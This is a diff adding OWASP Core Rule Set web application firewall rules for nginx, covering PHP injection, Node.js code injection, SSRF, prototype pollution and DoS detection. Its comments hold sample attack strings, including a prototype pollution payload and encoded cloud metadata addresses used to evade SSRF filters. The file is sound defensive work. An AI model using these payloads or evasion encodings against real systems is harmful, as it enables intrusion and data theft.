"id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# +# [ PHP Functions: Medium-Risk PHP Function Names ] +# +# In paranoia level 2, we add additional checks for most PHP functions. +# +# The size of the PHP function list is considerable. +# Even after excluding the more obscure PHP extensions, 1300+ functions remain. +# For performance and maintenance reasons, this rule does not use a regexp, +# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character +# in the matched variable. +# +# This approach carries some risk for false positives. Therefore, the function list +# has been curated to remove words closely matching natural language and terms often +# used in other contexts. +# +# This rule is a stricter sibling of rule 933150. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \ + "id:933151,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ + logdata:'Matched Data: %{TX.933151_TX_0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.933151_tx_0=%{tx.0}',\ + chain" + SecRule MATCHED_VARS "@pm (" \ + "capture,\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# +# [ PHP Variables: Common Variable Indexes ] +# +# In paranoia level 3, we add additional checks for parameters to many PHP variables. +# +# +# One of the more common variables used within attacks on PHP is $_SERVER. Because +# of how many different ways PHP has for executing variables (variable variables, +# etc) often just looking for $_SERVER will be less effective than looking for the +# various indexes within $_SERVER. This rule checks for these indexes. +# This rule is located in PL 3 because often developers will use these names as +# parameter names or values and this will lead to false positives. +# Because this list is not expected to change and it is limited in size we use a +# regex in this case to look for these values whereas in its sibling rule we use +# @pmFromFile for flexibility and performance. +# +# Regular expression generated from regex-assembly/933131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933131 +# +# This rule is a stricter sibling of rule 933130. +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \ + "id:933131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: Low-Value PHP Function Calls ] +# +# In paranoia level 3, we add additional checks for the remaining PHP functions. +# +# Most of these function names are likely to cause false positives in natural text +# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'. +# Therefore, these function names are not scanned in lower paranoia levels. +# +# To mitigate the risk of false positives somewhat, a regexp is used to look for +# PHP function syntax. (See rule 933160 for a description.) +# +# This rule is a stricter sibling of rule 933160. +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regular expression generated from regex-assembly/933161.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933161 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\s\v]|/\*.*\*/|(?:#|//).*)*\(.*\)" \ + "id:933161,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Script Uploads: Superfluous extension ] +# +# Block file uploads with PHP related extensions (.php, .phps, .phtml, +# .php5 etc) anywhere in the name, followed by a dot. +# +# Example: index.php.tmp +# +# Uploading of such files can lead to remote code execution if +# Apache is configured with AddType and MultiViews, as Apache will +# automatically do a filename match when the extension is unknown. +# This configuration is fortunately not common in modern installs. +# +# Blocking these file names might lead to more false positives. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +# This rule is a stricter sibling of rule 933110. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ + "id:933111,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Closing Tag Found ] +# +# http://www.php.net/manual/en/language.basic-syntax.phptags.php +# +# This check was extracted from 933100 (paranoia level 1), since the +# checked sequence '?>' commonly causes false positives. +# See issue #654 for discussion. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ + "id:933190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP Injection Attack: PHP Closing Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Functions: Variable Function Prevent Bypass ] +# +# This rule is a stricter sibling of 933210. +# Unlike 933210, this rule will also match "this is a 'dog' (not a cat)", because the semi-colon at the end of the string is optional. +# This is useful for PHP evals where the semi-colon is already hardcoded: +# +# +# Any potential function calls not at the end of a string will require a semi-colon to form valid PHP, which is automatically covered by 933210. +# +# Regular expression generated from regex-assembly/933211.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 933211 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:\((?:.+\)(?:[\"'][\-0-9A-Z_a-z]+[\"'])?\(.+|[^\)]*string[^\)]*\)[\s\v\"'\--\.0-9A-\[\]_a-\{\}]+\([^\)]*)|(?:\[[0-9]+\]|\{[0-9]+\}|\$[^\(-\),\.-/;\x5c]+|[\"'][\-0-9A-Z\x5c_a-z]+[\"'])\(.+)\)(?:;|$)?" \ + "id:933211,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:replaceComments,t:removeWhitespace,\ + msg:'PHP Injection Attack: Variable Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" diff --git a/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf new file mode 100644 index 00000000..354390e3 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf @@ -0,0 +1,366 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + + +# [ NodeJS Insecure unserialization / generic RCE signatures ] +# +# Libraries performing insecure unserialization: +# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) +# - funcster: __js_function +# +# See: +# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ +# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ +# +# Some generic snippets used: +# - function() { +# - new Function( +# - eval( +# - String.fromCharCode( +# +# Last two are used by nodejsshell.py, +# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py +# +# As base64 is sometimes (but not always) used to encode serialized values, +# use multiMatch and t:base64decode. +# +# Regular expression generated from regex-assembly/934100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934100 +# +# Stricter sibling: 934101 +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\v]+Function[\s\v]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\v]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,\ + msg:'Node.js Injection Attack 1/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# We provide only partial protection to SSRF. DNS Rebinding attacks needs +# to be handled at application level, and even those might be difficult to catch. +# +# PL1 rules are based on common attacks on cloud providers, based on well-known URLs. +# +# -=[ References ]=- +# https://highon.coffee/blog/ssrf-cheat-sheet/ +# https://cwe.mitre.org/data/definitions/918.html +# https://capec.mitre.org/data/definitions/664.html) +# +# Preventing: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf.data" \ + "id:934110,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# JavaScript prototype pollution injection attempts +# +# Example from https://hackerone.com/reports/869574 critical +# vulnerability in the TypeORM library: +# {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} +# +# Test cases are based on this list of payloads: +# https://github.com/BlackFan/client-side-prototype-pollution/blob/master/README.md +# +# See also: https://cwe.mitre.org/data/definitions/1321.html +# +# Note: only server-based (not DOM-based) attacks are covered here. +# Stricter sibling: 934131 + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__proto__|constructor\s*(?:\.|\[)\s*prototype)" \ + "id:934130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,\ + msg:'JavaScript Prototype Pollution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1/180/77',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Ruby generic RCE signatures ] +# +# Detects Ruby-based injection attacks. +# Example: Process.spawn("id") +# +# Regular expression generated from regex-assembly/934150.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934150 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Process[\s\v]*\.[\s\v]*spawn[\s\v]*\(" \ + "id:934150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Ruby Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-ruby',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ NodeJS DoS signatures ] +# +# NodeJS runs in a single thread, so any evaluated payloads that block execution can cause an easy DoS. +# This rule attempts to block e.g. while(true). +# +# Regular expression generated from regex-assembly/934160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934160 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx while[\s\v]*\([\s\v\(]*(?:!+(?:false|null|undefined|NaN|[\+\-]?0|\"{2}|'{2}|`{2})|(?:!!)*(?:(?:t(?:rue|his)|[\+\-]?(?:Infinity|[1-9][0-9]*)|new [A-Za-z][0-9A-Z_a-z]*|window|String|(?:Boolea|Functio)n|Object|Array)\b|\{.*\}|\[.*\]|\"[^\"]+\"|'[^']+'|`[^`]+`)).*\)" \ + "id:934160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,t:replaceComments,\ + msg:'Node.js DoS attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ PHP data: scheme ] +# +# PHP supports the `data:` scheme without using `//` before the content-type. +# +# Regular expression generated from regex-assembly/934170.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934170 +# +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^data:(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*" \ + "id:934170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP data scheme attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# This rule is a stricter sibling of 934100. +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\v]*\(" \ + "id:934101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:jsDecode,t:base64Decode,t:urlDecodeUni,t:jsDecode,\ + msg:'Node.js Injection Attack 2/2',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# -=[ SSRF Attacks ]=- +# +# PL2 rules adds SSRF capture for common evasion techniques. +# +# We add captures for these evasion techniques: (see source in util/regexp-assemble/data/regexp-934120.data) +# http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) +# http://2852039166/ Dotless decimal - \d{10} +# http://7147006462/ Dotless decimal with overflow - \d{10} +# http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal - (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} +# http://0xA9FEA9FE/ Dotless hexadecimal - 0x[a-f0-9]{8} +# http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow - 0x[a-f0-9]{16} +# http://0251.0376.0251.0376/ Dotted octal - Covered by the same below +# http://0251.00376.000251.0000376/ Dotted octal with padding - (?:0{1,4}\d{3}\.){3}0{1,4}\d{3}) +# http://169.254.43518/ - (?:\d{1,3}\.){2}\.\d{5} +# http://169.16689662/ - \d{1,3}\.\d{8} +# http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below) +# http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded - (?:(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,7}:|(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|(?:[0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|(?:[0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}|(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:(?:(?::[0-9a-fA-F]{1,4}){1,6})|:(?:(?::[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(?::[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(?::0{1,4}){0,1}:){0,1}(?:(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)|(?:[0-9a-fA-F]{1,4}:){1,4}:(?:(?:25[0-5]|(2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 - 